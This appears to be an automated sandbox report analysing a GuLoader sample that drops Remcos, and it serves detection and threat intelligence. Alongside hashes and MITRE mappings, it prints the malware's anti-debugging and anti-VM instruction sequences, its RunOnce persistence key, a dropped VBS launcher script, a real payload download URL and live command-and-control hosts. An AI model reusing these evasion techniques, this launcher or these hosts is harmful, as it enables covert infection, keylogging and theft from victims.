    Source: C:\Users\user\Desktop\JXblq0dqPN.exeRDTSC instruction interceptor: First address: 0000000000567E2C second address: 0000000000567E2C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, F567E6A1h 0x00000013 xor eax, 7B1C69AEh 0x00000018 xor eax, 278FAC68h 0x0000001d xor eax, A9F42366h 0x00000022 cpuid 0x00000024 bt ecx, 1Fh 0x00000028 jc 00007F764878D3EDh 0x0000002e cmp bh, dh 0x00000030 popad 0x00000031 call 00007F764878CF02h 0x00000036 lfence 0x00000039 rdtsc
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeRDTSC instruction interceptor: First address: 000000000056177F second address: 0000000000561808 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 cmp dword ptr [ebp+0000025Bh], eax 0x00000009 mov eax, dword ptr [ebp+0000025Bh] 0x0000000f je 00007F7648A60C92h 0x00000015 test bl, bl 0x00000017 push 038032CBh 0x0000001c sub dword ptr [esp], 0FF21A02h 0x00000023 xor dword ptr [esp], 10B6888Fh 0x0000002a xor dword ptr [esp], E3389046h 0x00000031 push 2B523B77h 0x00000036 cmp dh, ch 0x00000038 xor dword ptr [esp], 6A5053ABh 0x0000003f add dword ptr [esp], CC3008CFh 0x00000046 xor dword ptr [esp], 0D3271ABh 0x0000004d push dword ptr [ebp+24h] 0x00000050 mov dword ptr [ebp+000001F4h], edx 0x00000056 mov edx, 14EDA824h 0x0000005b add edx, 104167D9h 0x00000061 xor edx, BB5692E1h 0x00000067 test al, dl 0x00000069 xor edx, 9E799D1Ch 0x0000006f push edx 0x00000070 mov edx, dword ptr [ebp+000001F4h] 0x00000076 mov dword ptr [ebp+000001BEh], esi 0x0000007c test cl, dl 0x0000007e mov esi, E709E43Eh 0x00000083 pushad 0x00000084 mov ebx, 000000A7h 0x00000089 rdtsc
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeRDTSC instruction interceptor: First address: 0000000000565E68 second address: 0000000000569606 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push ecx 0x00000004 mov ecx, dword ptr [ebp+000001D9h] 0x0000000a mov dword ptr [ebp+00000212h], ecx 0x00000010 mov ecx, eax 0x00000012 push ecx 0x00000013 mov ecx, dword ptr [ebp+00000212h] 0x00000019 push dword ptr [ebp+000000D0h] 0x0000001f call 00007F7648790371h 0x00000024 call 00007F764878CCF5h 0x00000029 pop ebx 0x0000002a sub ebx, 05h 0x0000002d mov dword ptr [ebp+0000014Ch], edi 0x00000033 jmp 00007F764878CDD9h 0x00000038 pushad 0x00000039 mov esi, 00000069h 0x0000003e rdtsc
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02261C35 rdtsc
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeWindow / User API: foregroundWindowGot 513
    Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 6084Thread sleep time: -35000s >= -30000s
    Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 5548Thread sleep count: 250 > 30
    Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 5548Thread sleep time: -125000s >= -30000s
    Source: C:\Users\user\Desktop\JXblq0dqPN.exe TID: 5328Thread sleep time: -30000s >= -30000s
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeLast function: Thread delayed
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeLast function: Thread delayed
    Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\ANNONCEKAMPAGNE.exe\ROGUYSoftware\Microsoft\Windows\CurrentVersion\RunOnceOTATE
    Source: JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=\ANNONCEKAMPAGNE.exe\ROGUYSet W = CreateObject("WScript.Shell")
    Source: JXblq0dqPN.exe, 00000001.00000002.388223400.00000000023D0000.00000004.00000001.sdmp, JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeSystem information queried: ModuleInformation

    Anti Debugging:

    barindex
    Hides threads from debuggersShow sources
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeThread information set: HideFromDebugger
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeProcess queried: DebugPort
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02261C35 rdtsc
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022664DD LdrInitializeThunk,
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022685F4 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02267874 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02267879 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022654A8 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02262D2C mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_02267377 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeCode function: 1_2_022637C8 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\JXblq0dqPN.exeProcess created: C:\Users\user\Desktop\JXblq0dqPN.exe 'C:\Users\user\Desktop\JXblq0dqPN.exe'
    Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmpBinary or memory string: uProgram Manager
    Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmpBinary or memory string: Progman
    Source: logs.dat.17.drBinary or memory string: [ Program Manager ]
    Source: JXblq0dqPN.exe, 00000011.00000002.1310045709.0000000000EB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock

    Stealing of Sensitive Information:

    barindex
    GuLoader behavior detectedShow sources
    Source: Initial fileSignature Results: GuLoader behavior

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsWindows Management InstrumentationRegistry Run Keys / Startup Folder11Process Injection12Masquerading1Input Capture111Security Software Discovery721Remote ServicesInput Capture111Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder11Virtualization/Sandbox Evasion22LSASS MemoryVirtualization/Sandbox Evasion22Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSApplication Window Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol212Manipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery32VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    JXblq0dqPN.exe36%VirustotalBrowse
    JXblq0dqPN.exe18%ReversingLabsWin32.Trojan.Vebzenpak
    JXblq0dqPN.exe100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe100%Joe Sandbox ML
    C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe18%ReversingLabsWin32.Trojan.Vebzenpak

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    clientconfig.passport.net0%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    http://101.99.94.119/WEALTH_fkWglQyCXO188.bin1%VirustotalBrowse
    http://101.99.94.119/WEALTH_fkWglQyCXO188.bin0%Avira URL Cloudsafe
    http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.00%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    wealthyrem.ddns.net
    194.5.97.128
    truetrue
      unknown
      clientconfig.passport.net
      unknown
      unknowntrueunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://101.99.94.119/WEALTH_fkWglQyCXO188.bintrue
      • 1%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://101.99.94.119/WEALTH_fkWglQyCXO188.binwininet.dllMozilla/5.0JXblq0dqPN.exe, 00000011.00000002.1309329677.0000000000670000.00000004.00000001.sdmpfalse
      • Avira URL Cloud: safe
      unknown

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      194.5.97.128
      wealthyrem.ddns.netNetherlands
      208476DANILENKODEtrue
      101.99.94.119
      unknownMalaysia
      45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYtrue

      Private

      IP
      192.168.2.1

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:458740
      Start date:03.08.2021
      Start time:17:57:29
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 12m 39s
      Hypervisor based Inspection enabled:false
      Report type:light
      Sample file name:JXblq0dqPN.exe
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Run name:Suspected Instruction Hammering Hide Perf
      Number of analysed new started processes analysed:40
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.spyw.evad.winEXE@3/3@164/3
      EGA Information:Failed
      HDC Information:
      • Successful, ratio: 24.3% (good quality ratio 12.6%)
      • Quality average: 33.6%
      • Quality standard deviation: 37.7%
      HCA Information:Failed
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .exe
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
      • TCP Packets have been reduced to 100
      • Excluded IPs from analysis (whitelisted): 23.203.80.193, 96.16.150.73, 20.82.209.183, 51.103.5.159, 52.255.188.83, 131.253.33.200, 13.107.22.200, 104.43.193.48, 23.211.6.115, 23.211.4.86, 20.82.209.104, 13.88.21.125, 173.222.108.226, 173.222.108.210, 80.67.82.211, 80.67.82.235, 20.54.110.249, 40.112.88.60, 20.82.210.154, 20.190.159.135, 20.190.159.131, 40.126.31.9, 20.190.159.133, 40.126.31.136, 40.126.31.7, 40.126.31.138, 40.126.31.5, 40.127.240.158, 51.11.168.232, 20.50.102.62
      • Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, www.tm.a.prd.aadg.trafficmanager.net, vip1-par02p.wns.notify.trafficmanager.net, e11290.dspg.akamaiedge.net, e13551.dscg.akamaiedge.net, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, login.live.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus15.cloudapp.net, settingsfd-geo.trafficmanager.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, msagfx.live.com-6.edgekey.net, e12564.dspb.akamaiedge.net, authgfx.msa.akadns6.net, wns.notify.trafficmanager.net, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus15.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtDeviceIoControlFile calls found.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      17:59:36AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.vbs
      17:59:45AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce OTATE C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.vbs

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      194.5.97.128Fec9qUX4at.exeGet hashmaliciousBrowse
        LzbZ4T1iV8.exeGet hashmaliciousBrowse
          kGSHiWbgq9.exeGet hashmaliciousBrowse
            loKmeabs9V.exeGet hashmaliciousBrowse
              101.99.94.119Fec9qUX4at.exeGet hashmaliciousBrowse
              • 101.99.94.119/WEALTH_fkWglQyCXO188.bin
              LzbZ4T1iV8.exeGet hashmaliciousBrowse
              • 101.99.94.119/WEALTH_PRUuqVZw139.bin
              kGSHiWbgq9.exeGet hashmaliciousBrowse
              • 101.99.94.119/WEALTH_PRUuqVZw139.bin
              loKmeabs9V.exeGet hashmaliciousBrowse
              • 101.99.94.119/WEALTH_PRUuqVZw139.bin

              Domains

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              wealthyrem.ddns.netFec9qUX4at.exeGet hashmaliciousBrowse
              • 194.5.97.128
              LzbZ4T1iV8.exeGet hashmaliciousBrowse
              • 194.5.97.128
              kGSHiWbgq9.exeGet hashmaliciousBrowse
              • 194.5.97.128
              loKmeabs9V.exeGet hashmaliciousBrowse
              • 194.5.97.128

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYFec9qUX4at.exeGet hashmaliciousBrowse
              • 101.99.94.119
              LzbZ4T1iV8.exeGet hashmaliciousBrowse
              • 101.99.94.119
              kGSHiWbgq9.exeGet hashmaliciousBrowse
              • 101.99.94.119
              loKmeabs9V.exeGet hashmaliciousBrowse
              • 101.99.94.119
              Audio #Ud83d#Udcde lifewire.org.HTMLGet hashmaliciousBrowse
              • 111.90.141.176
              bitratencrypt.exeGet hashmaliciousBrowse
              • 111.90.149.108
              svchost.exeGet hashmaliciousBrowse
              • 111.90.149.108
              eVF243bmXC.exeGet hashmaliciousBrowse
              • 111.90.149.108
              xSnF0lxFUX.exeGet hashmaliciousBrowse
              • 111.90.146.149
              QppmM7JmZd.exeGet hashmaliciousBrowse
              • 111.90.146.149
              vNiyRd4GcH.exeGet hashmaliciousBrowse
              • 111.90.146.149
              4E825059CDC8C2116FF7737EEAD0E6482A2CBF0A5790D.exeGet hashmaliciousBrowse
              • 111.90.146.149
              SecuriteInfo.com.Trojan.Win32.Save.a.2038.exeGet hashmaliciousBrowse
              • 101.99.94.204
              Minutes of Meeting 22062021.exeGet hashmaliciousBrowse
              • 111.90.147.240
              naxpJ9fFZ4.exeGet hashmaliciousBrowse
              • 111.90.149.115
              dMH1IIv1a1.exeGet hashmaliciousBrowse
              • 111.90.149.115
              bmaphis@cardinaltek.com_16465506 AMDocAtt.HTMLGet hashmaliciousBrowse
              • 111.90.140.91
              4cDyOofgzT.xlsmGet hashmaliciousBrowse
              • 101.99.95.230
              4cDyOofgzT.xlsmGet hashmaliciousBrowse
              • 101.99.95.230
              341288734918_06172021.xlsmGet hashmaliciousBrowse
              • 101.99.95.230
              DANILENKODEGlobal Wire Transfer.pdf.exeGet hashmaliciousBrowse
              • 194.5.98.8
              New Order PO#42617.exeGet hashmaliciousBrowse
              • 194.5.98.7
              KITCOFiberOptics_CompanyCertifcate.exeGet hashmaliciousBrowse
              • 194.5.98.210
              7keerHhHvn.exeGet hashmaliciousBrowse
              • 194.5.98.74
              Purchase.exeGet hashmaliciousBrowse
              • 194.5.97.150
              Fec9qUX4at.exeGet hashmaliciousBrowse
              • 194.5.97.128
              Ordonnance PL-PB39-210706,pdf.exeGet hashmaliciousBrowse
              • 194.5.98.7
              Tzcyxxestkakhuvtmvfdserywturrfjrye.exeGet hashmaliciousBrowse
              • 194.5.98.72
              LzbZ4T1iV8.exeGet hashmaliciousBrowse
              • 194.5.97.128
              kGSHiWbgq9.exeGet hashmaliciousBrowse
              • 194.5.97.128
              loKmeabs9V.exeGet hashmaliciousBrowse
              • 194.5.97.128
              1niECmfIcE.exeGet hashmaliciousBrowse
              • 194.5.97.94
              Nuzbcdoajgupgalxelbnohzzeonlplvuro.exeGet hashmaliciousBrowse
              • 194.5.98.7
              RueoUfi1MZ.exeGet hashmaliciousBrowse
              • 194.5.98.3
              Departamento de contadores Consejos de pago 0.exeGet hashmaliciousBrowse
              • 194.5.98.7
              04_extracted.exeGet hashmaliciousBrowse
              • 194.5.97.18
              scanorder01321.jarGet hashmaliciousBrowse
              • 194.5.98.243
              scanorder01321.jarGet hashmaliciousBrowse
              • 194.5.98.243
              PO.exeGet hashmaliciousBrowse
              • 194.5.98.23
              PO B4007121.exeGet hashmaliciousBrowse
              • 194.5.98.7

              JA3 Fingerprints

              No context

              Dropped Files

              No context

              Created / dropped Files

              C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe
              Process:C:\Users\user\Desktop\JXblq0dqPN.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):114688
              Entropy (8bit):6.6665085666892185
              Encrypted:false
              SSDEEP:1536:mHPwUa96PZfLN0CNzYRn5ZxtBMAphNQmiPYDEZfM96nHPwU:mHIuZ1NzMBXMGh7DEhHI
              MD5:8718D75B7CAC53F13D01DDEA9B52CEE0
              SHA1:2A37A01DF74C887BB52EB2762D7D6AE0BD5E6B0B
              SHA-256:6F40242247DB00EEA1922D0C2A38337DDEA49D9DA02693679D2E4BFB19E6C088
              SHA-512:BD5EF6A34D6CE64FF42CCC54CEC25FCBA9813CB794E046C7929DA98CB11CD15F4EDBBCEA430B0859F7A3A2B34376BB9F904EB8BC50F9BC014E41A8C8397DEEB2
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 18%
              Reputation:low
              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...|T.Q.................@..........D........P....@.................................u"......................................TK..(....p...[..................................................................(... .......|............................text....=.......@.................. ..`.data...\....P.......P..............@....rsrc....[...p...`...`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.vbs
              Process:C:\Users\user\Desktop\JXblq0dqPN.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):121
              Entropy (8bit):5.1295795316147235
              Encrypted:false
              SSDEEP:3:jfF+m8nhvF3mRD0nacwRE2J5xAIWQMeLAl:jFqhv9IcNwi23fWQMeC
              MD5:9EB206EED530A22BC49F0AEE8BD5A6FA
              SHA1:3D12C666021570B736B82AC424BB3483822B0899
              SHA-256:52E3A418A72C858A1305038ECDD0B12678AD468E88227A8B40C7850B4EB5F8E1
              SHA-512:FC4CFB7B03C16B0B0F7C6172CD745B05032C1F94F491E0A8AEE1193C0E6D94E2C298F2209866C3EDD6CD4603C6897C4D8F0E6038AE420C2AD3A8063E7EFE8860
              Malicious:true
              Reputation:low
              Preview: Set W = CreateObject("WScript.Shell")..Set C = W.Exec ("C:\Users\user\AppData\Local\Temp\ROGUY\ANNONCEKAMPAGNE.exe")
              C:\Users\user\AppData\Roaming\remcos\logs.dat
              Process:C:\Users\user\Desktop\JXblq0dqPN.exe
              File Type:data
              Category:dropped
              Size (bytes):148
              Entropy (8bit):3.3910398388587963
              Encrypted:false
              SSDEEP:3:rklKlmuGlSlZPCl55JWRal2Jl+7R0DAlBG4LNQblovDl9il:IlKIuGI+b5YcIeeDAlybW/G
              MD5:0930ABF0309541D99206B336B56A2DC1
              SHA1:D82F63956D19BF7511F041004DB361FAD7734F2E
              SHA-256:3962E2DEB707D1B85418A7355AAF13270B9C0B771534393E2A5049649B47576E
              SHA-512:739D7C01496ABC283E5E24350C81B3ACBD5174813FE4F7EF795643285FF489BBBDB5211E87533ED18108B9D9FB38A2E334FA1945538266A9516B926DC5C3E538
              Malicious:false
              Reputation:low
              Preview: ....[.2.0.2.1./.0.8./.0.3. .1.7.:.5.9.:.3.9. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[. .P.r.o.g.r.a.m. .M.a.n.a.g.e.r. .].....

              Static File Info

              General

              File type:PE32 executable (GUI) Intel 80386, for MS Windows
              Entropy (8bit):6.6665085666892185
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.96%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:JXblq0dqPN.exe
              File size:114688
              MD5:8718d75b7cac53f13d01ddea9b52cee0
              SHA1:2a37a01df74c887bb52eb2762d7d6ae0bd5e6b0b
              SHA256:6f40242247db00eea1922d0c2a38337ddea49d9da02693679d2e4bfb19e6c088
              SHA512:bd5ef6a34d6ce64ff42ccc54cec25fcba9813cb794e046c7929da98cb11cd15f4edbbcea430b0859f7a3a2b34376bb9f904eb8bc50f9bc014e41a8c8397deeb2
              SSDEEP:1536:mHPwUa96PZfLN0CNzYRn5ZxtBMAphNQmiPYDEZfM96nHPwU:mHIuZ1NzMBXMGh7DEhHI
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L...|T.Q.................@..........D........P....@................

              File Icon

              Icon Hash:6a6a6a6a6a6a6a6a

              Static PE Info

              General

              Entrypoint:0x401144
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
              DLL Characteristics:
              Time Stamp:0x5188547C [Tue May 7 01:10:20 2013 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:5565993a5a9f2bfb76f28ab304be6bc1

              Entrypoint Preview

              Instruction
              push 00406B3Ch
              call 00007F7648944465h
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              xor byte ptr [eax], al
              add byte ptr [eax], al
              inc eax
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [esi-1B674E90h], bh
              sbb eax, 8587498Dh
              cmpsb
              inc edi
              jo 00007F7648944427h
              nop
              sub al, byte ptr [eax]
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [ecx], al
              add byte ptr [eax], al
              add byte ptr [edx+00h], al
              push es
              push eax
              add dword ptr [ecx], 55h
              inc esi
              dec edi
              push edx
              dec ebp
              push ebp
              inc ebp
              dec esi
              dec eax
              inc ebp
              inc esp
              push ebx
              add byte ptr [eax], ch
              add al, 02h
              add byte ptr [eax], al
              add byte ptr [eax], al
              dec esp
              xor dword ptr [eax], eax
              pop es
              xchg eax, ebx
              inc byte ptr [eax-6Bh]
              test al, CBh
              xchg byte ptr [ebx-80h], al
              xor dword ptr [esi+0Ah], edi
              push FEA6E7D3h
              wait
              adc bh, dh
              stc
              retn 964Fh
              xchg eax, ebx
              jmp 00007F767C4E251Ah
              sbb dword ptr [edx], edi
              dec edi
              lodsd
              xor ebx, dword ptr [ecx-48EE309Ah]
              or al, 00h
              stosb
              add byte ptr [eax-2Dh], ah
              xchg eax, ebx
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              add byte ptr [eax], al
              dec edi
              pop ecx
              add byte ptr [eax], al
              and al, 58h
              add byte ptr [eax], al
              add byte ptr [ecx], cl
              add byte ptr [esi+41h], cl
              push esp
              push esp
              dec ecx
              dec esp
              dec esp
              inc edi
              push ebx
              add byte ptr [48000601h], cl
              dec edi
              pop ecx
              inc esp
              inc ebp

              Data Directories

              NameVirtual AddressVirtual Size Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IMPORT0x14b540x28.text
              IMAGE_DIRECTORY_ENTRY_RESOURCE0x170000x5ba2.rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2280x20
              IMAGE_DIRECTORY_ENTRY_IAT0x10000x7c.text
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
